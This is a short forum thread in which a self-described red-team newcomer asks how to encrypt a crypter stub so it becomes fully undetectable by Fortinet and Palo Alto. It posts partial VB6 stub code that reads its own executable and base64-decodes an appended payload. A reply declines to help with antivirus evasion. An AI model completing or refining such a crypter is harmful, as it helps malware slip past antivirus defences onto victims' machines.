-
Sep 7th, 2022, 04:01 PM
#1
Thread Starter
New Member
Pentesting - Crypter
Good fellow community members , I have been seeing some incredible topics on this forum,
and I got curious because in my company we are starting the topic of av evasion.
So I got to it and installed vb6 (I am not a programmer, I understand the code only).
I was looking for the best algorithm to encrypt the stub to be able to create a fud, for Fortinet, palo alto, etc.
I just joined the red team but as you understand I am embarrassed to go asking for help with something that to my understanding is not so complicated,
I appreciate any response greetings! I leave the code, the stub!
Code:
Sub main()
Dim sMe() As String 'Array que contiene el Stub y el archivo cifrado
Dim sDelimitador As String 'Igual que en el builder
Dim b64 As New clsBase64 'Instancia de la clase clsBase64
Dim sDescifrado As String 'Archivo descifrado
Dim sBinario() As Byte 'Array de bytes que tendrá el archivo descifrado
sDelimitador = "[Blau]Delimitador[Blau]" 'IMPORTANTE: mismo delimitador que en el builder
sMe = SplitMyself(sDelimitador)
'[Array] sMe
'sMe(0) = Stub
'sMe(1) = Archivo cifrado
sDescifrado = b64.Decode(sMe(1)) 'Guardamos el archivo descifrado en la variable 'sDescifrado'
sBinario = StrConv(sDescifrado, vbFromUnicode) 'Convertimos el archivo descifrado a una array de bytes
End Sub
Public Function GetCurrentPath() 'Función para obtener la ruta del archivo
GetCurrentPath = App.path & "\" & App.EXEName & ".exe"
End Function
Public Function ReadMyself() 'Función para leerse a sí mismo
Dim ret As String
Open GetCurrentPath For Binary As #1
ret = Space(LOF(1))
Get #1, , ret
Close #1
ReadMyself = ret
End Function
Public Function SplitMyself(sDelimitador As String) 'Función para dividir el stub del archivo cifrado gracias al delimitador
SplitMyself = Split(ReadMyself, sDelimitador)
End Function
-
Sep 7th, 2022, 04:19 PM
#2
Thread Starter
New Member
Re: Pentesting - Crypter
I have seen things like CryptoSys API, is it ok?
-
Sep 10th, 2022, 11:38 AM
#3
Thread Starter
New Member
-
Sep 12th, 2022, 02:39 AM
#4
Re: Pentesting - Crypter
By AV Evasion, I assume you mean Anti Virus Evasion. If so you simply shouldn't be doing it and you're unlikely to get any help here.
Instead you should be writing your software conforming to normal Operating System Best Practice such that it doesn't appear to be a virus. If you absolutely have to break best practice in some way then you should be contacting the major Anti Virus software providers to get your software white listed and/or informing your customers that your software is likely to be detected as a virus.
If I've misunderstood and AV Evasion has some other meaning then I think you're going to have to be clearer about what you're asking.
The best argument against democracy is a five minute conversation with the average voter - Winston Churchill
Hadoop actually sounds more like the way they greet each other in Yorkshire - Inferrd
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
Click Here to Expand Forum to Full Width
|